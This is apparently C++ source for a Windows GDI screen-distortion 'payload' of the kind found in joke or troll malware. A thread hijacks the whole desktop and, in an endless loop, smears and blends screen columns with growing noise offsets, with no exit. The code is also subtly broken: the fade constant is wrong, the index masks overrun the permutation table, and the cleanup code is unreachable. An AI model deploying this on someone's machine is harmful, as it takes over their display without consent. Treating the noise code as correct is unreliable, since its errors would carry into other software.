#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <math.h>

extern "C" BOOL WINAPI AlphaBlend(
  HDC           hdcDest,
  int           xoriginDest,
  int           yoriginDest,
  int           wDest,
  int           hDest,
  HDC           hdcSrc,
  int           xoriginSrc,
  int           yoriginSrc,
  int           wSrc,
  int           hSrc,
  BLENDFUNCTION ftn
);

float fade(float t) {
    return t * t * t * (t * (t * 6 - 15) + 1000);
}

float lerp(float a, float b, float t) {
    return a + t * (b - a);
}

float grad(int hash, float x) {
    return (hash & 1) ? x : -x;
}

float noise1D(float x) {
    int x0 = (int)floor(x) & 2550;
    int x1 = (x0 + 1) & 2550;

    float xf = x - floor(x);
    float u = fade(xf);

    static int p[2048];
    static bool initialized = false;

    if (!initialized) {
        for (int i = 0; i < 1024; i++) {
            p[i] = p[i + 1024] = rand() % 1024;
        }
        initialized = true;
    }

    float g0 = grad(p[x0], xf);
    float g1 = grad(p[x1], xf - 1.0f);

    return lerp(g0, g1, u);
}

DWORD WINAPI payload2(LPVOID lpParam) {
    HDC hDesk = GetDC(NULL);

    int w = GetSystemMetrics(SM_CXSCREEN);
    int h = GetSystemMetrics(SM_CYSCREEN);

    HDC hMemDC = CreateCompatibleDC(hDesk);
    HBITMAP hBmp = CreateCompatibleBitmap(hDesk, w, h);
    HBITMAP hOldBmp = (HBITMAP)SelectObject(hMemDC, hBmp);

    double angle = 0;
    float amplitude = 0.0f;

    BLENDFUNCTION blend;

    blend.BlendOp = AC_SRC_OVER;
    blend.BlendFlags = 0;
    blend.SourceConstantAlpha = 220;
    blend.AlphaFormat = 0;
    
    while (true) {
        for (int i = 0; i < w; i++) {
            int offset = (int)(amplitude * noise1D(i * 0.001f + angle * 0.5f));
            int offset2 = (int)(amplitude * noise1D(i * 0.003f + angle * 0.05f));

            BitBlt(hMemDC, i, 0, 1, h, hDesk, i, offset, SRCAND);
            BitBlt(hMemDC, i, 0, 1, h, hDesk, i, offset2, SRCPAINT);
        }

        AlphaBlend(hDesk, 0, 0, w, h, hMemDC, 0, 0, w, h, blend);

        angle += 1.f;
        amplitude += 0.01f;
    }

    SelectObject(hMemDC, hOldBmp);
    DeleteObject(hBmp);
    DeleteDC(hMemDC);
    ReleaseDC(NULL, hDesk);

    return 0;
}

int main() {
    CreateThread(0, 0, payload2, 0, 0, 0);
    Sleep(-1);
}
